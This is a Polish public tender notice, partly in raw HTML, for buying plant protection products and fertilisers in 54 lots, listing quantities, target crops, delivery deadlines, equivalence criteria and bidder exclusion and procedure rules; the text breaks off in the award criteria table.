informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 47, cpv: 24440000-0	Krótki opis części zamówienia:	Dr Green Energy lub równoważny	Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 48, cpv: 24440000-0	Krótki opis części zamówienia:	Dr Green Start lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 49, cpv: 24440000-0	Krótki opis części zamówienia:	Yara Kombiphos lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 50, cpv: 24440000-0	Krótki opis części zamówienia:	Yara Vita Zboże lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 51, cpv: 24440000-0	Krótki opis części zamówienia:	Agravita Mn FAST lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 51, cpv: 24440000-0	Krótki opis części zamówienia:	Agravita Mn FAST lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 52, cpv: 24440000-0	Krótki opis części zamówienia:	Agravita Zn FAST lub równoważny	Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 53, cpv: 24440000-0	Krótki opis części zamówienia:	Agravita Activ 48 lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 54, cpv: 24440000-0	Krótki opis części zamówienia:	Startus Acrtiv Duo lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:Nr Zadania	Nazwa	Jednostka miary	Ilość Uprawa kluczowa	Termin dostawy1. Puma Uniwersal 069 EW lub równoważny	Litr	80	Pszenica, pszenżyto, żyto	3 dni od dnia podpisania umowy2. Sekator 125 OD lub równoważny	Litr	20	Pszenica, pszenżyto	3 dni od dnia podpisania umowy3. Clayton Cyflux lub równoważny	Litr	50	Pszenica, pszenżyto, jęczmień	Od dnia podpisania umowy do 5 kwietnia 2020 roku4. Praktis lub równoważny	Litr	150	Pszenica	Od dnia podpisania umowy do 5 kwietnia 2020 roku5. Flipper lub równoważny	Litr	20	Nie dotycz	Od dnia podpisania umowy do 5 kwietnia 2020 roku6. Stabilna 750 SL lub równoważny	Litr	200	Pszenica, żyto, owies	Od dnia podpisania umowy do 1 maja 2020 roku7. Moddus 250 SC lub równoważny	Litr	20	Pszenica, jęczmień, żyto, pszenżyto, owies	Od dnia podpisania umowy do 1 maja 2020 roku8. Cerone 480 SL lub równoważny	Litr	10	Jęczmień, żyto, pszenżyto, pszenica, Od dnia podpisania umowy do 1 maja 2020 roku9. Arcade 880 EC lub równoważny Litr	60	Ziemniak	Od dnia podpisania umowy do 20 kwietnia 2020 roku10. Command 480 EC lub równoważny	Litr	60	Ziemniak	Od dnia podpisania umowy do 20 kwietnia 2020 roku11. Proman 500 SC lub równoważny	Litr	60	Ziemniak	Od dnia podpisania umowy do 20 kwietnia 2020 roku12. Leimay 200 SC lub równoważny	Litr	130	Ziemniak	Od dnia podpisania umowy do 20 kwietnia 2020 roku13. Mancolaxyl lub równoważny	Kilogramy	1800	Ziemniak	Od dnia podpisania umowy do 20 kwietnia 2020 roku14. Carial Star 500 SC lub równoważny	Litr	220	Ziemniak	Od dnia podpisania umowy do 10 maja 2020 roku15. Moncut 460 SC lub równoważny	Litr	45	Ziemniak	Do 3 dni od dnia podpisania umowy16. Globaztar AZT 250 SC lub równoważny	Litr	480	Ziemniak	Od dnia podpisania umowy do 1 kwietnia 2020 roku17. Proteus 110 OD lub równoważny	Litr	400	Ziemniak	Od dnia podpisania umowy do 10 kwietnia 2020 roku18. Carnadine 200 SL lub równoważny	Litr	80	Ziemniak	Od dnia podpisania umowy do 25 kwietnia 2020 roku19. Amigo lub równoważny	Litr	1000	Ziemniak	Od dnia podpisania umowy do 10 kwietnia 2020 roku20. Select Super 120 EC lub równoważny	Litr	200	Ziemniak	Od dnia podpisania umowy do 1 maja 2020 roku21. Sencor Liquid 600 SC lub równoważny	Litr	20	Ziemniak	Od dnia podpisania umowy do 1 maja 2020 roku22. Spuma lub równoważny	Litr	12	Ziemniak	Od dnia podpisania umowy do 1 maja 2020 roku23. Toprex 375 SC lub równoważny	Litr	40	Rzepak	Od dnia podpisania umowy do 1 kwietnia 2020 roku24. Nurelle D 550 EC lub równoważny	Litr	150	Rzepak	Od dnia podpisania umowy do 1 maja 2020 roku25. Dursban 480 EC lub równoważny	Litr	400	Rzepak	Od dnia podpisania umowy do 1 kwietnia 2020 roku26. Cyperkill Max 500 EC lub równoważny	Litr	70	Rzepak	Od dnia podpisania umowy do 1 kwietnia 2020 roku27. Propulse 250 SC lub równoważny	Litr	90	Rzepak	Od dnia podpisania umowy do 1 maja 2020 roku28. Globagran 480 SL lub równoważny	Litr	100	Fasola	Od dnia podpisania umowy do 1 maja 2020 roku29. Karate Zeon 050 CS lub równoważny	Litr	25	Fasola	Od dnia podpisania umowy do 1 kwietnia 2020 roku30. Goltix-S 700SC lub równoważny	Litr	20	Szpinak	Od dnia podpisania umowy do 1 kwietnia 2020 roku31. Venzar 80 WP lub równoważny	Kilogramy	20	Szpinak	Od dnia podpisania umowy do 1 kwietnia 2020 roku32. Sulcotrek 500 SC lub równoważny	Litr	120	Kukurydza	Od dnia podpisania umowy do 10 kwietnia 2020 roku33. Ikanos 040 OD lub równoważny Litr	120	Kukurydza	Od dnia podpisania umowy do 10 kwietnia 2020 roku34. Roundup 360 SL lub równoważny	Litr	200	Kukurydza, ziemniak, marchew, burak	Od dnia podpisania umowy do 5 kwietnia 2020 roku35. FCA Microphos BTC lub równoważny	Kilogramy	500	Nie dotyczy	Od dnia podpisania umowy do 20 kwietnia 2020 roku36. Siarczan Magnezu o minimalnej zawartości MgO 16% i SO3 32%, granulowany, niezbrylony	Kilogramy	4500	Nie dotyczy	Od dnia podpisania umowy do 10 kwietnia 2020 roku37. ADOB PO lub równoważny	Litr	20000	Nie dotyczy	Od dnia podpisania umowy do 10 kwietnia 2020 roku38. Florovit lub równoważny	Litr	2000	Nie dotyczy	Od dnia podpisania umowy do 10 kwietnia 2020 roku39. ADOB Mo lub równoważny	Litr	100	Nie dotyczy	Od dnia podpisania umowy do 1 kwietnia 2020 roku40. Pekacid ICL Everris 0-60-20 lub równoważny	Kilogramy	1225	Nie dotyczy	Od dnia podpisania umowy do 1 kwietnia 2020 roku41. Agroleaf Crop Potatoes lub równoważny	Kilogramy	1250	Nie dotyczy	Od dnia podpisania umowy do 1 maja 2020 roku42. Dr Green Ziemniak lub równoważny	Kilogramy	600	Nie dotyczy	Od dnia podpisania umowy do 10 kwietnia 2020 roku43. Dr Green Rzepak lub równoważny	Kilogramy	200	Nie dotyczy	Od dnia podpisania umowy do 1 kwietnia 2020 roku44. Dr Green Zboża lub równoważny	Kilogramy	500	Nie dotyczy	Od dnia podpisania umowy do 5 kwietnia 2020 roku45. Dr Green Kukurydza lub równoważny	Kilogramy	240	Nie dotyczy	Od dnia podpisania umowy do 10 kwietnia 2020 roku46. Dr Green Warzywa lub równoważny	Kilogramy	100	Nie dotyczy	Od dnia podpisania umowy do 10 kwietnia 2020 roku47. Dr Green Energy lub równoważny	Kilogramy	400	Nie dotyczy	Od dnia podpisania umowy do 10 kwietnia 2020 roku48. Dr Green Start lub równoważny	Kilogramy	1000	Nie dotyczy	Od dnia podpisania umowy do 5 kwietnia 2020 roku49. Yara Kombiphos lub równoważny	Litr	800	Nie dotyczy	Od dnia podpisania umowy do 5 kwietnia 2020 roku50. Yara Vita Zboże lub równoważny	Litr	200	Nie dotyczy	Od dnia podpisania umowy do 1 maja 2020 roku51. Agravita Mn FAST lub równoważny	Litr	1000	Nie dotyczy	Od dnia podpisania umowy do 10 kwietnia 2020 roku52. Agravita Zn FAST lub równoważny	Litr	1000	Nie dotyczy	Od dnia podpisania umowy do 10 kwietnia 2020 roku53. Agravita Activ 48 lub równoważny	Kilogramy	160	Nie dotyczy	Od dnia podpisania umowy do 10 kwietnia 2020 roku54. Startus Acrtiv Duo lub równoważny	Litr	1000	Nie dotyczy	Od dnia podpisania umowy do 10 kwietnia 2020 rokuZamawiający dopuszcza możliwość zaoferowania przedmiotu zamówienia równoważnego do wskazanego powyżej. Dla zadań 1-34: Zamawiający uzna preparat za równoważny, jeżeli Wykonawca wraz z ofertą złoży: 1. Treść etykiety rejestracyjnej zaoferowanego preparatu równoważnego, która będzie odpowiadać treści etykiety rejestracyjnej preparatu wymienionego z nazwy handlowej w następującym zakresie: - rodzaju i ilości substancji czynnej (w przypadku zaproponowania preparatu równoważnego ilość substancji czynnej, zawartej w preparacie równoważnym nie może być mniejsza niż ilość substancji czynnej zawartej w preparacie wymienionym z nazwy handlowej); - formulacji; - zakresu stosowania (rodzaju zarejestrowanej uprawy kluczowej) 2. Środek równoważny będzie dopuszczony do stosowania, poprzez jego umieszczenie na stronie internetowej Ministerstwa Rolnictwa i Rozwoju Wsi:https://www.gov.pl/web/rolnictwo/etykiety-srodkow-ochrony-roslinDla zadań 35-54: Zamawiający dopuszcza składanie ofert równoważnych, oraz zastosowanie produktów równoważnych, tj. produktów innych niż opisane powyżej z zastrzeżeniem, by ich parametry jakościowe i cechy (określone w jednym z następujących dokumentów: ulotce informacyjnej, akredytowanym przez Polskie Centrum Akredytacji sprawozdaniu z badań lub ateście, karcie technologicznej, certyfikacie WE, etykiecie z deklaracją WE, COA lub karcie charakterystyki) były co najmniej takie same, jak parametry i cechy produktów opisanych powyżej.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">24450000-3</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2020-05-10</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie wprowadza szczególnych warunków tym zakresie</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie wprowadza szczególnych warunków tym zakresie</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Zamawiający nie wprowadza szczególnych warunków tym zakresie</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Nie</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">Zamawiający przed udzieleniem zamówienia, może wezwać wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzień złożenia oświadczeń lub dokumentów, o których mowa w rozdziale IX pkt 3 niniejszej SIWZ.3.	W celu potwierdzenia braku podstaw do wykluczenia wykonawcy z udziału w postępowaniu, o których mowa w art. 24 ust 1 ustawy zamawiający żąda na wezwanie, o którym mowa w ust. 2 powyżej, następujących dokumentów:1) informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 oraz ust. 5 pkt 5 i 6 ustawy wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;2) oświadczenie wykonawcy o braku wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo – w przypadku wydania takiego wyroku lub decyzji dokumenty potwierdzające dokonanie płatności tych należności wraz z ewentualnymi odsetkami lub grzywnami lub zawarcie wiążącego porozumienia w sprawie spłat tych należności3) oświadczenie wykonawcy o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się o zamówienia publiczne;4. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w ust. 3 pkt 1 powyżej składa informację z odpowiedniego rejestru albo, w przypadku braku takiego rejestru, inny równoważny dokument wydany przez właściwy organ sądowy lub administracyjny kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dotyczy informacja albo dokument, w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 oraz ust. 5 pkt 5 i 6 ustawy;5. Dokumenty, o których mowa w ust. 4 powyżej powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w ust. 4, zastępuje się je dokumentem zawierającym oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na miejsce zamieszkania tej osoby. Postanowienia zdania pierwszego stosuje się.6. Wykonawca mający siedzibę na terytorium Rzeczypospolitej Polskiej, w odniesieniu do osoby mającej miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, której dotyczy dokument wskazany w ust. 3 pkt 1 powyżej, składa dokument, o którym mowa w ust. 4 powyżej, w zakresie określonym w art. 24 ust. 1 pkt 14 i 21 oraz ust. 5 pkt 5 i 6 ustawy. Jeżeli w kraju, w którym miejsce zamieszkania ma osoba, której dokument miał dotyczyć, nie wydaje się takich dokumentów, zastępuje się go dokumentem zawierającym oświadczenie tej osoby złożonym przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na miejsce zamieszkania tej osoby. Postanowienia ust. 5 zdanie pierwsze stosuje się.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1. W celu wstępnego potwierdzenia, że wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu do oferty należy załączyć:a. oświadczenie o niepodleganiu wykluczeniu według wzoru stanowiącego załącznik nr 3 do niniejszej SIWZ oraz oświadczenia o spełnianiu warunków udziału w postępowaniu według wzoru stanowiącego załącznik nr 2 do niniejszej SIWZ.13. Zgodnie z art. 24 ust. 11 ustawy wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji określonych w art. 86 ust 5 ustawy przekazuje zamawiającemu oświadczenie o przynależności albo braku przynależności do tej samej grupy kapitałowej; w przypadku przynależności do tej samej grupy kapitałowej wykonawca może przedstawić dowody (złożyć wraz z oświadczeniem dokumenty bądź informacje) potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu.14.W przypadku zaoferowania produktu równoważnego w stosunku do wskazanego przez Zamawiającego, w celu potwierdzenia równoważności:1 dla zadań 1-34: etykiet rejestracyjnych, a dla zadań 35-54 jednego z następujących dokumentów: ulotek informacyjnych, akredytowanych przez Polskie Centrum Akredytacji sprawozdań z badań lub atestów, kart technologicznych, certyfikatów WE, etykiet z deklaracją WE, COA lub kart charakterystyki, potwierdzających wszystkie wymagane przez Zamawiającego parametry i cechy wraz z podaniem ich formy i zawartości.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: 